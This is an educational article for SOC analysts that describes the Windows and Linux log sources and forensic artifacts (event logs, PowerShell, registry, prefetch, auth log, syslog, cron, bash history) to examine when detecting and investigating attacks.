Categories
Cyber Security Detection SOC Analyst

Log Sources for Digital Forensics: Windows and Linux

SOC analysts obtain information on operating systems and analyze these logs in order to detect an attack and reveal the details about the attack. In this article, we will discuss which operating systems are encountered by SOC analysts and the logs that can be examined through these systems.

Operating System Fundamentals for the Analyst

When there is an attempt to attack the target device, some evidence can be seen on the operating system of the device. It is very important for SOC analysts to examine these records. Although these logs are often insufficient to show whether there is an attack and the details of the attack alone, from a holistic point of view, it is one of the most important sources of analysis at the point of detection of the attack.

Place in the Operating System and IT sector

The operating system is the system software of the devices within a IT infrastructure. Devices within the IT infrastructure have a wide range of system software. Network devices include operating systems with very low processing capacity and capability. On the server-side, operating systems with high processing capacity are generally used.

Frequently Used Operating Systems

  • Windows
  • Linux
  • Android
  • Macintosh
  • iOS

Windows Logs

Application Logs

Applications installed on the Windows operating system may have their own special logs and these logs are the source that should be examined by the analyst regarding that application.

DLP (Data Loss Prevention) Logs

DLP software is security software installed in the system to prevent data leakage. This software can keep logs on the transactions it performs, and these logs are one of the points that the analyst should examine in order to detect violations.

Endpoint Security Solutions Logs

Endpoint security solutions are security software aimed at ensuring the security installed on end-user devices and reducing data breaches. This software can create important and comprehensive logs in case of violation. In order to understand whether the violation has occurred and to see the details, the analyst should examine these logs.

Event Logs

Event logs are a comprehensive resource that collects logs from many points of the system that are included in the Windows operating system. These logs include a wide variety of log types. This is the most important log source that the security analyst should examine.

File Integrity Monitoring (FIM) Logs

File integrity monitoring software is the security software that follows the changes and accesses of the files in the system. In order to obtain information about which files have been changed in case of an attack violation, the analyst must examine the logs of these software.

Honeypot Logs

Honeypot systems are trap systems that are a copy of real systems specially installed for the attacker. Since the attack methods on Honeypot systems may be an attack vector that the attacker can use against the real system, the logs obtained through these systems enable measures to be taken against significant attacks. Therefore, these logs may contain critical information.

MSSQL Logs

MSSQL is Microsoft’s relational database management system. It is often used as a database. It is important to review the logs of the MSSQL database to view unauthorized access to the MSSQL database or to view error messages.

Powershell Logs

PowerShell is an inter-platform task automation solution consisting of a command line shell, a script language, and a configuration management framework. PowerShell runs on Windows, Linux, and macos. It is often preferred by attackers because attacks can be more effective when performed with powershell. Powershell’s logs must be examined in order to detect the harmful commands run in the system and to reveal the attack.

Task Scheduler Logs

Scheduled tasks are used in windows to perform certain operations at certain times. The intruder infiltrating the system can use this to ensure persistence. The analyst can examine logs of scheduled tasks while securing the system and detecting attacks.

Windows Defender

Windows defender is the most basic structure that is responsible for protecting the system that comes with the Windows operating system against attackers and malware. Logs related to the scans or findings of Windows defender may contain some important details. Therefore, examining the logs in this section can provide new information related to the attack details.

WMI Logs

WMI (Windows Management Instrumentation) is a technology that enables almost every object to be controlled in Windows operating systems and can perform operations and management functions in the operating system. The operations that can be performed with WMI commands on the system are numerous and if the attacker has run WMI commands in the system, the logs of WMI must be examined and evaluated.

windows host investigation

Windows Forensics Artifacts

Autorun Items

Autorun items refer to the operations initiated during the boot of the Windows operating system. Attackers can use this feature to ensure persistence in the system. It is recommended to be checked in forensic analysis procedures.

Jump Lists

Jump lists is a feature in the Windows operating system that allows you to view the latest documents in programs that are pinned to the taskbar.

LNK Files

LNK files (tags or windows shortcut files) are files that are usually automatically created by the Windows operating system every time a user opens the files. These files are used by the operating system to provide quick access to a specific file.

Memory

The operating system operates with many processes during operation. In addition, each application running on the system has one or more processes in the memory. Suspicious processes need to be examined in order to detect the aggressor’s movements. You can check our memory analysis training for incident response.

Prefetch Files

The system creates a prefetch file for an application that is run for the first time in the Windows operating system. The operating system saves certain information about the application in prefetch files so that it can be opened faster after the first opening of the application. The analyst can find some valuable data on application history in prefetch files.

Registry

The Windows Registry is the section where information and settings for software programs, hardware devices, user preferences, and operating system configurations are stored. Serious important records can be found in this section specific to the Windows operating system. It is one of the must-see areas for the analyst.

Recycle Bin

Files deleted on the Windows operating system are first sent to trash. If the attacker deleted a file on the system, it may be possible to retrieve the relevant file from the trash.

Windows Services

Windows Services are a key component of the Microsoft Windows operating system and enable the creation and management of long-term processes.

Linux Logs

Auditd Logs

The Linux Audit system enables detailed logging of security-related events called Linux audit logs. The system administrator configures the Linux auditing rules to specify which events are to be logged.

Bash History

The bash history keeps a record of the commands applied in the bash command line. Detecting the commands applied in the bash command line during forensic analysis of Linux systems can provide important information.

Scheduled Tasks

Scheduled tasks on Linux systems are managed with cron. The list of commands to be executed at certain time intervals and frequencies is included in the cron files.

Startup Items

Linux systems also have a section with a list of commands and programs to be run at the first start-up of the system, just like Windows systems. A new record may have been entered in this section to ensure persistence. During the forensic analysis phase, we should check whether a record was added to this section.

Recent Files

It may be possible to detect the latest files used in Linux operating systems and reveal the files associated with the attack.

User Accounts

Linux systems have important user files. By examining these files, it can be seen whether the attacker has created a new user or not, and passwords for these accounts can be obtained.

Trash

Similar to the Windows operating system, Linux systems also have a trash can and the deleted files are sent here first. The trash can should be inspected to retrieve the deleted files in the system.

Memory

Operating systems operate with many processes during operation. In addition, each application running on the system has one or more processes in the memory. Suspicious processes need to be examined in order to detect the aggressor’s movements.

Services

Services running on Linux systems can be found. Services are programs running in the background or waiting to run. In forensic analysis procedures, it is useful to check the services working on the system.

Linux System Logs

Auth Log

The log file in which successful or unsuccessful login and authentication processes are recorded is called auth log. The auth log file, where attack attempts against important accounts can be seen, has an important place in the examination of Linux systems.

Kernel Log

This is the file where warning, information and error records of the Kernel are kept. It is usually examined in kernel-related error situations.

Syslog

In Linux systems, the log source that shows general information and messages about the system is called syslog. It is one of the first points in the study of Linux systems.

soc analyst doing forensics on the linux host
Share on social media